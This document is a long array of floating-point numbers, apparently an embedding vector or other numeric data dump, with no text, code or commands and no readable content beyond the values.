[ -0.033758245408535004, 0.007914094254374504, -0.017617184668779373, -0.00018601932970341295, -0.0003732921613845974, -0.008375382050871849, -0.02267129346728325, 0.04954632371664047, -0.04652990400791168, 0.009658966213464737, 0.012819790281355381, 0.02586420811712742, 0.0030184269417077303, -0.03050115332007408, -0.013766433112323284, 0.027757493779063225, -0.004312038421630859, 0.018387334421277046, 0.037512727081775665, 0.018034348264336586, 0.026329506188631058, 0.004853550344705582, -0.03542690351605415, 0.04277542233467102, -0.013541806489229202, 0.014560651034116745, -0.031479887664318085, 0.016879122704267502, -0.01784181036055088, 0.007821837440133095, -0.014528561383485794, 0.015812143683433533, -0.025447042658925056, 0.010854302905499935, 0.027837717905640602, 0.009939749725162983, 0.059718724340200424, 0.042582884430885315, 0.01962278224527836, -0.006734802387654781, -0.012426692992448807, -0.007673422805964947, -0.04437990114092827, 0.010525384917855263, -0.026473909616470337, 0.02384256385266781, -0.04479706659913063, 0.015723899006843567, -0.010886392556130886, -0.041941091418266296, 0.024981744587421417, -0.022077636793255806, -0.0656873881816864, -0.029490331187844276, 0.0009677016641944647, -0.06485305726528168, 0.06648962944746017, -0.0014129446353763342, -0.014592739753425121, 0.03565153107047081, -0.0006092007970437407, -0.00028053318965248764, -0.027115702629089355, 0.03975899890065193, 0.03340526297688484, 0.008519785478711128, -0.02894480898976326, 0.03677466884255409, -0.00916959997266531, -0.00044223462464287877, 0.005246647633612156, -0.03805825114250183, 0.008664188906550407, 0.013934903778135777, 0.022928010672330856, -0.04601646959781647, 0.035202279686927795, 0.021901143714785576, -0.014624829404056072, -0.019558604806661606, -0.0454709455370903, 0.02206159196794033, -0.06536649167537689, 0.0011782895307987928, 0.030773915350437164, -0.032651156187057495, -0.02390674315392971, -0.05727991461753845, -0.014007105492055416, -0.011496094986796379, 0.006421928759664297, 0.010332847014069557, 0.05124707147479057, -0.01252296194434166, -0.004584799986332655, 0.0002582209126558155, -0.0252545066177845, 0.016686586663126945, -0.036550041288137436, -0.017216064035892487, -0.03302018716931343, -0.004608867224305868, 0.02074591815471649, -0.014552628621459007, 0.0420052707195282, 0.012258222326636314, 0.014689008705317974, -0.01716792955994606, 0.029698913916945457, 0.1245075985789299, 0.020665694028139114, 0.001956462161615491, -0.014833412133157253, -0.03249070793390274, -0.05005975812673569, 0.01016437727957964, 0.002238248707726598, -0.041909001767635345, -0.006393850315362215, 0.026858985424041748, 0.008279114030301571, 0.010517362505197525, -0.025414953008294106, 0.06796574592590332, 0.011407848447561264, 0.049642592668533325, -0.03202540799975395, 0.0054873195476830006, -0.01124740019440651, -0.02958660013973713, -0.036550041288137436, -0.019526515156030655, -0.030773915350437164, -0.03969481959939003, 0.01436811313033104, -0.007954206317663193, -0.04633736610412598, 0.00475327018648386, 0.020633604377508163, 0.020120171830058098, -0.013469604775309563, -0.02820674702525139, 0.07438366860151291, -0.02923361398279667, -0.01939815655350685, -0.02671458199620247, -0.028078390285372734, 0.016133040189743042, -0.014039195142686367, 0.04149183630943298, -0.0009180630440823734, -0.01200952846556902, -0.019526515156030655, 0.02114703878760338, 0.015362890437245369, 0.01200952846556902, -0.026522044092416763, -0.026297416538000107, -0.008896837942302227, -0.016044793650507927, 0.009562697261571884, -0.008624076843261719, -0.0008212929242290556, -0.03308436647057533, -0.034817203879356384, -0.022944055497646332, 0.009602809324860573, 0.00831922609359026, 0.00015781559341121465, 0.01111904252320528, -0.006943384651094675, -0.011143109761178493, -0.003231020411476493, -0.0014069278258830309, -0.03661422058939934, -0.022430622950196266, 0.01904517039656639, 0.0539105087518692, -0.049289606511592865, 0.029490331187844276, -0.0470433346927166, -0.0007024611113592982, -0.008206912316381931, -0.015362890437245369, 0.007492918986827135, -0.023441443219780922, 0.0227033831179142, -0.005126311909407377, -0.011849080212414265, -0.015884345397353172, 0.0286560021340847, 0.030725780874490738, 0.010541429743170738, -0.016879122704267502, -0.006782936863601208, -0.0125951636582613, -0.018708229064941406, -0.06125902384519577, -0.011335646733641624, 0.006133122369647026, -0.012402625754475594, -0.007882005535066128, 0.012418670579791069, -0.01748882606625557, -0.019430246204137802, -0.003148790914565325, -0.01570785418152809, 0.056734390556812286, 0.008559897541999817, -0.027195926755666733, -0.016558228060603142, -0.03154406696557999, 0.03934183344244957, 0.024949654936790466, -0.02727614901959896, 0.006373794283717871, -0.01983136497437954, 0.025270551443099976, -0.01075001247227192, -0.022751517593860626, 0.03184891492128372, -0.031624287366867065, -0.0049698748625814915, 0.008856725879013538, -0.03712765499949455, -0.0037103586364537477, 0.020023902878165245, -0.003245059633627534, -0.01491363625973463, -0.003026449354365468, -0.0026493966579437256, 0.008335270918905735, -0.0018180757761001587, 0.01570785418152809, -0.000032590989576419815, 0.04104258492588997, 0.0026734638959169388, -0.00533890537917614, -0.00023214811517391354, 0.0028118500486016273, -0.002755693392828107, 0.02976309321820736, 0.01728024333715439, 0.0014370118733495474, 0.0028720181435346603, 0.011327624320983887, 0.032859738916158676, 0.02366607077419758, 0.013060462661087513, -0.010220534168183804, -0.03175264596939087, -0.04210153967142105, 0.011391803622245789, -0.018082482740283012, -0.021371666342020035, 0.02528659626841545, 0.025238461792469025, 0.006923328619450331, 0.018291065469384193, -0.054006777703762054, 0.0286560021340847, -0.003967075143009424, -0.03571571037173271, -0.012330424040555954, -0.007316425908356905, -0.03940601274371147, 0.010108220390975475, 0.003971086349338293, -0.0014340034686028957, -0.01763322949409485, -0.019526515156030655, -0.027019433677196503, -0.044251542538404465, -0.014825389720499516, -0.007593198679387569, -0.009939749725162983, 0.031335484236478806, -0.031062722206115723, 0.018066437914967537, -0.0031247236765921116, 0.0038547618314623833, 0.01939815655350685, -0.01670263148844242, -0.0028680069372057915, -0.004781348630785942, -0.00018238418851979077, 0.0077095236629247665, -0.008375382050871849, -0.030340705066919327, 0.003451636293902993, 0.02308845892548561, 0.011592363938689232, -0.000011814233403129037, 0.017729496583342552, 0.014745165593922138, 0.006093010772019625, 0.017151884734630585, 0.003852756228297949, 0.024131370708346367, -0.0011111019412055612, -0.04669035226106644, 0.03776944428682327, 0.015459159389138222, -0.03213772177696228, -0.03107876516878605, -0.023040324449539185, -0.027308238670229912, -0.006401872728019953, 0.011961393989622593, 0.014961770735681057, 0.008600009605288506, -0.03728809952735901, -0.0024548533838242292, 0.019767185673117638, 0.01951047033071518, -0.017183974385261536, 0.005960640963166952, -0.032683245837688446, 0.0005289767868816853, -0.010509340092539787, 0.01050131767988205, 0.005298793315887451, -0.06376200914382935, 0.015186397358775139, 0.009033218957483768, -0.04033661261200905, -0.04162019491195679, -0.020761962980031967, -0.06539858132600784, 0.024532489478588104, -0.003413529833778739, 0.0024989766534417868, 0.014279866591095924, -0.016510093584656715, 0.032474663108587265, -0.02191718854010105, -0.021130993962287903, -0.04036870226264, 0.02830301597714424, -0.010894414968788624, -0.019767185673117638, 0.003070572391152382, -0.012916059233248234, -0.011680610477924347, -0.0016325578326359391, 0.016558228060603142, 0.008295158855617046, 0.01012426521629095, 0.0260727908462286, -0.002326495246961713, 0.00106898439116776, 0.01363807450979948, 0.05355752259492874, 0.011985461227595806, -0.0010699871927499771, 0.005158401094377041, -0.027179881930351257, -0.004648979287594557, 0.017296288162469864, -0.0037404426839202642, -0.004580788780003786, -0.012635275721549988, -0.002679480705410242, 0.027260104194283485, 0.02255897969007492, -0.03555526211857796, -0.015354868024587631, -0.01075001247227192, -0.01395897101610899, 0.010132287628948689, -0.01962278224527836, 0.016798898577690125, -0.043609749525785446, 0.02657017856836319, -0.008752435445785522, 0.02082614228129387, 0.023746294900774956, -0.0053469277918338776, -0.06324857473373413, 0.01495374832302332, -0.06610455363988876, 0.03337317332625389, 0.022045547142624855, -0.015338823199272156, 0.009017174132168293, 0.04951423406600952, -0.007934150286018848, 0.020697783678770065, 0.0029061133973300457, -0.015908412635326385, -0.03207354247570038, 0.01415150798857212, -0.040946315973997116, -0.03302018716931343, -0.00994777213782072, -0.0066987015306949615, -0.033116456121206284, -0.025013834238052368, 0.03000376559793949, -0.023008234798908234, 0.005551498848944902, -0.0030785948038101196, 0.001256507937796414, -0.0036140899173915386, 0.025061968713998795, 0.05817842483520508, -0.014448337256908417, -0.005306815728545189, -0.0019755151588469744, -0.02575189433991909, -0.00681903725489974, -0.015419047325849533, -0.009466428309679031, -0.018708229064941406, 0.0026935196947306395, 0.014360090717673302, 0.008944972418248653, -0.010485272854566574, -0.05625304952263832, 0.020312709733843803, -0.012338446453213692, 0.019670916721224785, -0.005379016976803541, -0.00028805420151911676, 0.026233239099383354, 0.02074591815471649, -0.013277066871523857, 0.019141439348459244, 0.03638959303498268, -0.01480934489518404, 0.010998706333339214, -0.03138361871242523, -0.01028471253812313, -0.029008988291025162, 0.002809844445437193, -0.010397026315331459, -0.023457488045096397, -0.015475204214453697, -0.0035960394889116287, 0.010637698695063591, -0.062125444412231445, 0.031239213421940804, 0.028672046959400177, 0.01962278224527836, 0.019911589100956917, -0.023617936298251152, -0.06193290650844574, -0.03181682527065277, 0.006546276155859232, -0.013742365874350071, 0.017007481306791306, 0.04970677196979523, 0.031736601144075394, -0.014175575226545334, 0.0005001462996006012, 0.00563974492251873, -0.019382111728191376, -0.029345927760004997, 0.0015473198145627975, 0.007464840542525053, 0.00400117039680481, 0.012362513691186905, 0.0294101070612669, 0.008736390620470047, 0.04601646959781647, -0.00024806754663586617, -0.00342756905592978, -0.00022412571706809103, 0.012169976718723774, -0.005403084214776754, -0.018275020644068718, -0.028463464230298996, -0.03671048954129219, 0.023120548576116562, -0.004231814295053482, 0.02958660013973713, -0.020697783678770065, -0.04001571610569954, 0.006863160524517298, -0.04332094267010689, 0.0011201271554455161, -0.025463087484240532, 0.07213739305734634, 0.03507392108440399, -0.04097840562462807, -0.012386580929160118, -0.0193660669028759, -0.014303933829069138, -0.05246647819876671, 0.013028373010456562, 0.013694231398403645, 0.009121465496718884, 0.0030043877195566893, -0.008672211319208145, 0.025463087484240532, 0.01795412413775921, -0.00644599599763751, -0.006827059667557478, 0.022976145148277283, -0.011881169863045216, -0.008383404463529587, -0.009795347228646278, -0.01057351939380169, 0.0045085870660841465, 0.0036040619015693665, -0.015017927624285221, -0.019638827070593834, 0.021580247208476067, -0.046305276453495026, -0.031479887664318085, -0.04877617210149765, -0.02408323623239994, 0.000008406281267525628, -0.011255422607064247, -0.010116242803633213, -0.00111511314753443, -0.01755300536751747, -0.000005781766503787367, 0.03536272794008255, 0.005908495280891657, -0.007079765200614929, -0.022928010672330856, -0.0036361515522003174, 0.04264706373214722, -0.022510845214128494, 0.020601514726877213, -0.000692433153744787, -0.013798522762954235, 0.005294782109558582, -0.018146662041544914, -0.04957841336727142, -0.01939815655350685, -0.008399449288845062, 0.054423943161964417, -0.031832870095968246, -0.0023646014742553234, -0.011808968149125576, 0.03000376559793949, 0.016092928126454353, 0.010958594270050526, -0.016975391656160355, 0.027035478502511978, -0.04014407470822334, 0.01965487189590931, -0.018114572390913963, 0.007228179834783077, -0.015298711135983467, 0.006221368908882141, 0.006421928759664297, -0.023184727877378464, -0.001832114881835878, -0.01851569302380085, 0.014424270018935204, 0.018114572390913963, 0.013654119335114956, -0.011656543239951134, 0.014303933829069138, 0.020168306306004524, 0.02891271933913231, 0.0017107761232182384, -0.007151966914534569, 0.015723899006843567, 0.008912882767617702, -0.007869971916079521, 0.005443196278065443, 0.006221368908882141, -0.019285842776298523, 0.0011231355601921678, -0.045246317982673645, -0.001458070706576109, -0.003491748357191682, -0.023040324449539185, 0.014448337256908417, -0.018628006801009178, 0.009618854150176048, -0.007328459527343512, 0.009763257578015327, -0.02883249521255493, -0.0013557850616052747, 0.010188444517552853, 0.023393310606479645, -0.002029666444286704, 0.017216064035892487, 0.008463628590106964, -0.028816450387239456, -0.009562697261571884, 0.005740025080740452, 0.0003108678793068975, -0.015170352533459663, 0.012362513691186905, -0.015836210921406746, 0.01186512503772974, 0.006562320981174707, -0.01050131767988205, 0.006794970482587814, 0.00835131574422121, 0.004865583963692188, 0.01784181036055088, 0.04267915338277817, -0.016060838475823402, -0.02376233972609043, 0.05891648307442665, -0.05342916399240494, -0.004945807624608278, -0.02469293773174286, 0.011488072574138641, 0.023954877629876137, 0.03606869652867317, -0.05410304665565491, 0.012835835106670856, -0.01183303538709879, 0.013501694425940514, 0.05994335189461708, -0.003122718073427677, 0.01901308074593544, 0.017296288162469864, 0.045984379947185516, 0.01035691425204277, 0.0059806969948112965, 0.011712699197232723, 0.015314755961298943, -0.013413447886705399, 0.028704136610031128, -0.02082614228129387, -0.0017899973317980766, 0.04640154540538788, 0.0022362431045621634, -0.022542934864759445, -0.020585469901561737, -0.04957841336727142, -0.031014587730169296, 0.00043646854464896023, -0.006032842677086592, -0.03200936317443848, 0.005122300703078508, 0.015098150819540024, 0.03998362645506859, -0.017938079312443733, -0.012659342959523201, -0.009346092119812965, -0.03558735176920891, 0.004408307373523712, -0.012426692992448807, -0.0060087754391133785, -0.03160824254155159, -0.008696278557181358, 0.021516067907214165, 0.005740025080740452, 0.018900766968727112, 0.048262741416692734, -0.019301887601614, -0.01032482460141182, 0.03940601274371147, 0.02472502738237381, 0.04142765700817108, -0.018852632492780685, 0.03046906366944313, 0.023457488045096397, -0.011945349164307117, 0.014993860386312008, -0.03898885101079941, -0.021596292033791542, 0.014664941467344761, -0.006237413734197617, 0.007095810025930405, 0.020906366407871246, -0.009121465496718884, -0.0005460244137793779, -0.019205618649721146, 0.024773161858320236, 0.015764011070132256, -0.034849293529987335, 0.016333600506186485, -0.026842940598726273, -0.012001506052911282, -0.005643756128847599, -0.01546718180179596, 0.0005144362221471965, -0.0010178416268900037, 0.02469293773174286, -0.001708770520053804, -0.012089752592146397, -0.033822424709796906, 0.011961393989622593, 0.000525466981343925, 0.015908412635326385, 0.01378247793763876, 0.0002242510672658682, -0.004929762799292803, -0.022462712600827217, 0.0370313860476017, 0.0003081101749558002, 0.006137133575975895, 0.04431572183966637, 0.01237855851650238, -0.010741990059614182, 0.004833494313061237, 0.008198889903724194, -0.019927633926272392, -0.010798146016895771, -0.005443196278065443, 0.013630052097141743, 0.011135087348520756, -0.029987720772624016, 0.01957464963197708, 0.014680986292660236, -0.01787390001118183, -0.008463628590106964, -0.012980238534510136, -0.0014871518360450864, 0.01083825808018446, 0.03610078617930412, 0.0026453854516148567, -0.002334517426788807, 0.009675011038780212, 0.030533242970705032, -0.006875194143503904, -0.02756495587527752, -0.0454709455370903, 0.01542706973850727, 0.012731543742120266, -0.01574796624481678, 0.0001351272512692958, -0.03135152906179428, 0.0025290607009083033, 0.0218209195882082, 0.036838848143815994, 0.023650025948882103, -0.017119795083999634, 0.00747687416151166, -0.01670263148844242, -0.010276691056787968, 0.013573896139860153, 0.011030795983970165, -0.024949654936790466, 0.010084153153002262, -0.019414201378822327, 0.016622407361865044, 0.0024428199976682663, 0.006534242536872625, -0.0028680069372057915, -0.013910836540162563, 0.0016536165494471788, -0.013084529899060726, -0.0138546796515584, -0.015282666310667992, 0.02007203735411167, -0.0018271008739247918, 0.0009571722475811839, -0.023248907178640366, 0.01001997385174036, 0.0076814452186226845, 0.023778384551405907, -0.030164211988449097, -0.02376233972609043, -0.017585095018148422, 0.03979108855128288, -0.015916435047984123, -0.005844316445291042, -0.00920168962329626, 0.019173528999090195, -0.022222040221095085, 0.015796098858118057, -0.01901308074593544, -0.00001368664834444644, 0.0009707100689411163, 0.0011141103459522128, -0.024163460358977318, 0.0019263781141489744, -0.022751517593860626, -0.00478937104344368, -0.012803745456039906, -0.004741236567497253, -0.01801830343902111, 0.02838324010372162, 0.033501528203487396, -0.0352664589881897, 0.023104503750801086, 0.014793300069868565, 0.02273547276854515, -0.04569557309150696, -0.013164753094315529, -0.05962245538830757, 0.02891271933913231, -0.024596668779850006, -0.023650025948882103, 0.031560108065605164, 0.005350938998162746, 0.00563974492251873, -0.012065685354173183, -0.01108695287257433, -0.01951047033071518, 0.03510601073503494, -0.03143175318837166, 0.0011802951339632273, -0.026907119899988174, -0.009217734448611736, 0.03555526211857796, -0.03642168268561363, -0.01470505353063345, -0.009442361071705818, 0.0016175158089026809, -0.0044484189711511135, -0.031126899644732475, -0.003792588133364916, -0.026858985424041748, -0.01965487189590931, -0.021066814661026, -0.013718298636376858, 0.03504183143377304, -0.009562697261571884, -0.0017157901311293244, 0.003934985958039761, -0.05070154741406441, 0.003953035920858383, 0.00593256251886487, 0.02536681853234768, -0.012362513691186905, -0.04309631511569023, 0.03841123729944229, -0.030950408428907394, -0.002675469499081373, 0.00707575399428606, -0.026666447520256042, 0.050926174968481064, -0.05124707147479057, 0.023248907178640366, -0.008591987192630768, 0.031768690794706345, 0.006405883934348822, -0.004320060834288597, 0.01752091571688652, -0.026313461363315582, 0.016405802220106125, -0.04338512197136879, 0.013589940965175629, 0.01296419370919466, -0.0022061592899262905, -0.02387465350329876, 0.017248153686523438, -0.008776502683758736, 0.010806168429553509, -0.007797769736498594, -0.013204865157604218, 0.0022462711203843355, -0.018611961975693703, -0.005134334322065115, -0.03289182856678963, 0.0025972509756684303, 0.030276525765657425, 0.02167651616036892, 0.03337317332625389, 0.034175410866737366, 0.013806545175611973, -0.027468686923384666, 0.00038006107206456363, 0.01968696154654026, 0.02235039882361889, 0.03677466884255409, -0.03436794877052307, 0.0437701977789402, -0.004404296167194843, -0.026762716472148895, -0.019205618649721146, 0.01621326431632042, 0.014721098355948925, -0.010798146016895771, -0.05015602707862854, -0.01589236781001091, -0.01326904445886612, -0.01378247793763876, -0.004163624253123999, 0.022992189973592758, -0.0071599893271923065, 0.008463628590106964, 0.017905989661812782, -0.015515316277742386, -0.004941796418279409, -0.021516067907214165, -0.02419555000960827, 0.01035691425204277, 0.007444784510880709, -0.013501694425940514, -0.0022462711203843355, 0.016309533268213272, -0.023008234798908234, 0.0018882716540247202, 0.0005239627789705992, -0.016116995364427567, -0.017119795083999634, -0.0033934740349650383, -0.026939209550619125, -0.03504183143377304, -0.005098233465105295, -0.0040472992695868015, 0.011816990561783314, 0.008720345795154572, -0.028575778007507324, 0.0027857774402946234, -0.04068959876894951, -0.02674667164683342, -0.005114278290420771, 0.0065583097748458385, -0.015098150819540024, -0.010525384917855263, -0.009225756861269474, 0.006642544642090797, -0.0010960600338876247, -0.008880793116986752, -0.03289182856678963, 0.03220190107822418, -0.015796098858118057, -0.0019534537568688393, 0.007693478837609291, -0.036870937794446945, -0.03870004415512085, -0.02369816042482853, 0.009474450722336769, 0.017183974385261536, 0.017007481306791306, -0.007272303104400635, -0.0016455941367894411, 0.006425939965993166, 0.029105257242918015, 0.006205324083566666, -0.021804874762892723, -0.024131370708346367, 0.0002534576051402837, -0.005944596137851477, 0.005756069906055927, 0.007091798819601536, 0.0007355535053648055, 0.004287971183657646, -0.021692560985684395, -0.001806042157113552, -0.0168149434030056, 0.004432374145835638, 0.00933004729449749, -0.0018581877229735255, -0.03542690351605415, 0.009450383484363556, 0.02185300923883915, -0.007328459527343512, -0.013525761663913727, 0.03058137744665146, 0.015194419771432877, 0.009867548011243343, 0.004023232031613588, -0.01667054183781147, -0.025013834238052368, -0.0007902061333879828, -0.025382863357663155, -0.020200395956635475, -0.012081730179488659, -0.04197318106889725, -0.01933397725224495, -0.028607867658138275, -0.01602874882519245, 0.019670916721224785, 0.0286560021340847, 0.024147415533661842, -0.0013577906647697091, -0.010180422104895115, -0.00814273301512003, -0.029394062235951424, -0.00019166007405146956, -0.01050131767988205, 0.007982284761965275, -0.028335105627775192, -0.014817367307841778, 0.007380605209618807, -0.01752091571688652, -0.00876045785844326, 0.001083023613318801, -0.007376594003289938, 0.05557916685938835, -0.0055474876426160336, -0.003634145949035883, -0.024035101756453514, -0.03305227681994438, -0.004652990493923426, -0.01840337924659252, 0.020729873329401016, -0.004993942100554705, -0.008146744221448898, -0.005062132608145475, -0.003313249908387661, -0.01872427389025688, 0.013365313410758972, 0.00659842137247324, -0.02000785805284977, 0.008018385618925095, 0.010100197978317738, -0.03465675562620163, 0.031271304935216904, 0.005214557982981205, 0.0034857315476983786, -0.01678285375237465, -0.016622407361865044, -0.020986590534448624, -0.052370209246873856, -0.015443114563822746, -0.007938161492347717, 0.03154406696557999, 0.012194043025374413, 0.017151884734630585, -0.0010729955974966288, 0.015459159389138222, -0.04328885301947594, 0.010886392556130886, -0.024035101756453514, -0.006301593035459518, 0.009498517960309982, 0.01028471253812313, -0.02557540126144886, 0.01252296194434166, -0.040176164358854294, 0.01009217556566, -0.0026674470864236355, 0.029313838109374046, 0.01571587659418583, 0.004420340992510319, 0.0061210887506604195, -0.004456441383808851, 0.013614008203148842, 0.02486943081021309, -0.00563974492251873, -0.0061210887506604195, 0.009883592836558819, 0.03138361871242523, 0.02944219671189785, 0.010758033953607082, -0.009490495547652245, 0.008896837942302227, 0.00016533659072592854, -0.006137133575975895, 0.0057801371440291405, -0.0012735555646941066, -0.022799652069807053, 0.011664565652608871, 0.01816270686686039, -0.0013096563052386045, -0.018178751692175865, -0.019783230498433113, -0.0063818166963756084, -0.016044793650507927, 0.006971463095396757, 0.027179881930351257, 0.008263069204986095, 0.0052586812525987625, 0.009979861788451672, -0.00920168962329626, 0.042903780937194824, -0.03292391821742058, 0.006450007203966379, -0.008126688189804554, 0.014071284793317318, -0.0030685667879879475, 0.024885475635528564, 0.0023425398394465446, 0.00497388606891036, -0.012651320546865463, -0.000069381196226459, -0.008961017243564129, -0.018948901444673538, -0.018644049763679504, -0.039823178201913834, 0.01737651228904724, 0.006754858419299126, 0.008343293331563473, 0.0018491625087335706, 0.003949024714529514, -0.0005390048027038574, -0.0000328730238834396, 0.0227675624191761, -0.03898885101079941, 0.009281913749873638, -0.01798621378839016, -0.01933397725224495, -0.0023826519027352333, -0.007725568488240242, -0.009410271421074867, -0.008752435445785522, 0.015001882798969746, -0.024676892906427383, -0.0035097987856715918, -0.02753286622464657, -0.008054486475884914, -0.0071479557082057, -0.013172775506973267, -0.018820542842149734, -0.01012426521629095, -0.01363807450979948, -0.0235858466476202, -0.011608408764004707, 0.005924540106207132, 0.007200101390480995, 0.06263887882232666, 0.03000376559793949, -0.0155554274097085, -0.009899637661874294, -0.023280996829271317, -0.02511010318994522, -0.005824260413646698, 0.01617315225303173, 0.05140751972794533, -0.007970251142978668, 0.029041077941656113, -0.0009331050678156316, -0.0079662399366498, -0.006494130473583937, -0.022189950570464134, 0.012659342959523201, 0.005924540106207132, -0.008471651002764702, 0.013678186573088169, 0.028495553880929947, -0.0011030796449631453, 0.013966993428766727, 0.02021644078195095, -0.0088487034663558, -0.00906530860811472, -0.017408601939678192, 0.0006713743787258863, -0.008776502683758736, -0.03642168268561363, -0.004805415868759155, -0.002436803188174963, -0.003997159190475941, -0.005944596137851477, -0.004372206516563892, -0.003670246573165059, -0.014311956241726875, 0.0005375006003305316, 0.007208123803138733, 0.024243684485554695, -0.0176974069327116, 0.013164753094315529, -0.013894791714847088, 0.007701501250267029, -0.010116242803633213, 0.004957841243594885, -0.018676139414310455, 0.0036682409700006247, -0.013389380648732185, -0.0013427487574517727, 0.011447960510849953, -0.016590317711234093, -0.03600451722741127, -0.004833494313061237, 0.0386679545044899, -0.014897591434419155, 0.00250499346293509, -0.01748882606625557, 0.006373794283717871, 0.0027075589168816805, -0.020601514726877213, 0.015651697292923927, 0.015403002500534058, 0.0031969251576811075, 0.015547404997050762, -0.014111395925283432, -0.019301887601614, -0.015338823199272156, 0.013862702064216137, 0.017889944836497307, 0.014801322482526302, 0.0025290607009083033, 0.009257846511900425, -0.003531860187649727, -0.005034054163843393, 0.0022603103425353765, 0.01866009458899498, -0.026939209550619125, 0.006084988359361887, -0.02117912843823433, -0.017922034487128258, 0.015908412635326385, 0.024805251508951187, -0.0014741154154762626, 0.03239443898200989, -0.014135463163256645, 0.023040324449539185, 0.004741236567497253, -0.01362203061580658, -0.025559356436133385, -0.01822688616812229, 0.003569966647773981, 0.014279866591095924, 0.007512975018471479, -0.0008834664477035403, -0.01411941833794117, -0.014440314844250679, -0.009594786912202835, -0.01586027815937996, -0.007821837440133095, -0.005699913017451763, -0.003044499782845378, -0.01600468158721924, 0.036870937794446945, 0.010878370143473148, -0.018948901444673538, 0.01968696154654026, 0.0021018679253757, 0.018531737849116325, 0.01245076023042202, -0.006867171730846167, -0.05660603195428848, -0.006309615448117256, -0.011680610477924347, -0.015162330120801926, -0.0007671416969969869, -0.025463087484240532, -0.003184891538694501, 0.008086576126515865, -0.0037243978586047888, -0.030870184302330017, -0.0028038278687745333, -0.014079307205975056, 0.00618927925825119, -0.017296288162469864, -0.00991568248718977, -0.008018385618925095, -0.026794806122779846, -0.01737651228904724, 0.0387321338057518, 0.035811979323625565, 0.009394226595759392, 0.038603775203228, 0.01480934489518404, -0.012972216121852398, 0.04787766560912132, -0.02003994770348072, 0.017360467463731766, 0.00872836820781231, -0.0004607864248100668, -0.0013597962679341435, 0.01032482460141182, 0.029490331187844276, 0.025816073641180992, 0.008391426876187325, 0.028527643531560898, 0.00559562211856246, -0.009458405897021294, -0.008872770704329014, 0.013469604775309563, 0.031094809994101524, -0.01183303538709879, 0.003678268985822797, 0.01801830343902111, 0.037512727081775665, 0.00626148097217083, 0.009666988626122475, 0.006971463095396757, -0.009105420671403408, -0.015370912849903107, 0.011215311475098133, 0.005322860553860664, 0.03924556449055672, 0.020312709733843803, -0.026120925322175026, 0.005150378681719303, 0.01737651228904724, -0.011640498414635658, -0.06183663755655289, -0.028880629688501358, -0.0035679610446095467, 0.02036084420979023, 0.021869054064154625, -0.01083825808018446, 0.002962270053103566, 0.009490495547652245, 0.025992566719651222, -0.026409730315208435, -0.019173528999090195, -0.006955418270081282, -0.015515316277742386, -0.01363807450979948, 0.02458062395453453, -0.01589236781001091, -0.0013357291463762522, 0.028335105627775192, -0.0002369114081375301, 0.03359779715538025, -0.02132353186607361, -0.01454460620880127, -0.001147202798165381, 0.019414201378822327, 0.02068173885345459, -0.015370912849903107, -0.023986967280507088, -0.016943302005529404, -0.005190490745007992, 0.016895167529582977, 0.00655429856851697, 0.01617315225303173, -0.007865960709750652, -0.002581206150352955, -0.009426316246390343, -0.002815861254930496, -0.023682115599513054, 0.01699143648147583, -0.027260104194283485, 0.025848163291811943, -0.01525057666003704, -0.018114572390913963, -0.013975015841424465, -0.00008448586595477536, -0.004295993596315384, -0.004564743954688311, 0.0064419847913086414, 0.0052306028082966805, 0.0022643215488642454, -0.010918482206761837, -0.022992189973592758, -0.010629676282405853, 0.01067781075835228, -0.01684703305363655, -0.0068390932865440845, -0.005555510055273771, -0.0033292947337031364, -0.006782936863601208, -0.017970168963074684, 0.03273138031363487, -0.0006563323549926281, -0.006028831470757723, -0.008150755427777767, 0.01571587659418583, 0.01883658766746521, 0.02475711703300476, 0.009827435947954655, -0.006245436146855354, 0.005210546776652336, -0.020055992528796196, -0.0016486025415360928, 0.0054873195476830006, -0.017232108861207962, -0.004512598272413015, 0.017761586233973503, -0.01670263148844242, 0.014568673446774483, -0.015900390222668648, -0.00029758078744634986, 0.019991813227534294, 0.02742055244743824, -0.007067731581628323, 0.02039293386042118, -0.009763257578015327, 0.019317932426929474, 0.00936213694512844, -0.013605985790491104, -0.001874232548289001, 0.01087034773081541, 0.020473157986998558, -0.0063818166963756084, 0.02486943081021309, -0.0027456653770059347, 0.0005480300169438124, -0.002286383183673024, -0.02795003168284893, 0.014993860386312008, -0.010998706333339214, 0.0327153354883194, -0.0014520538970828056, -0.002695525297895074, -0.009707100689411163, 0.015812143683433533, -0.003598045092076063, -0.005042076576501131, 0.005655789747834206, 0.0015713870525360107, 0.0018842604476958513, 0.015443114563822746, -0.0035539218224585056, -0.016229309141635895, -0.023136593401432037, 0.001347762648947537, -0.006145155988633633, 0.02217390574514866, -0.003762504318729043, -0.005812226794660091, -0.007761669345200062, 0.006357749458402395, -0.004701124504208565, -0.04283960163593292, -0.005647767335176468, -0.02191718854010105, 0.0041074673645198345, -0.011929304338991642, 0.011913259513676167, -0.008640121668577194, -0.012105797417461872, -0.0038186609745025635, -0.019285842776298523, 0.02798212133347988, -0.017232108861207962, -0.00943433865904808, 0.005848327651619911, -0.003926963545382023, 0.013654119335114956, 0.011111020110547543, -0.004516609478741884, 0.01763322949409485, 0.0073324707336723804, -0.005282748490571976, -0.011399826034903526, -0.009795347228646278, 0.045214228332042694, -0.027228016406297684, -0.01330113410949707, -0.0014741154154762626, 0.006987507920712233, 0.002348556648939848, -0.014247776940464973, 0.009378181770443916, 0.014761210419237614, -0.002647391054779291, 0.012980238534510136, 0.029025033116340637, -0.011399826034903526, -0.03407914191484451, 0.015619606710970402, -0.0021700584329664707, 0.00924180168658495, -0.011111020110547543, -0.009747212752699852, 0.015972591936588287, 0.02815861441195011, 0.023120548576116562, 0.006999541539698839, 0.014047217555344105, 0.006875194143503904, 0.0071920789778232574, -0.0037003306206315756, 0.021869054064154625, -0.01989554427564144, -0.008567919954657555, -0.013020350597798824, 0.01558751706033945, -0.019093304872512817, -0.020697783678770065, 0.00039936494431458414, -0.030051900073885918, 0.010445160791277885, 0.02809443511068821, 0.00909739825874567, -0.0014470398891717196, 0.011094975285232067, -0.0016074877930805087, 0.0020697785075753927, 0.007713534869253635, 0.0015112190740182996, 0.0008318222826346755, 0.00858396477997303, -0.01813061721622944, 0.0036140899173915386, -0.00800234079360962, -0.01670263148844242, 0.003269126871600747, -0.015354868024587631, 0.005013998132199049, -0.016574272885918617, 0.020553382113575935, -0.01296419370919466, -0.008567919954657555, 0.002280366374179721, -0.007942172698676586, -0.010894414968788624, -0.01965487189590931, 0.003979108761996031, 0.02259106934070587, -0.019317932426929474, 0.018772408366203308, 0.026907119899988174, -0.007520997431129217, -0.015138262882828712, 0.019317932426929474, 0.012025573290884495, -0.030356749892234802, 0.003674257779493928, -0.016911212354898453, 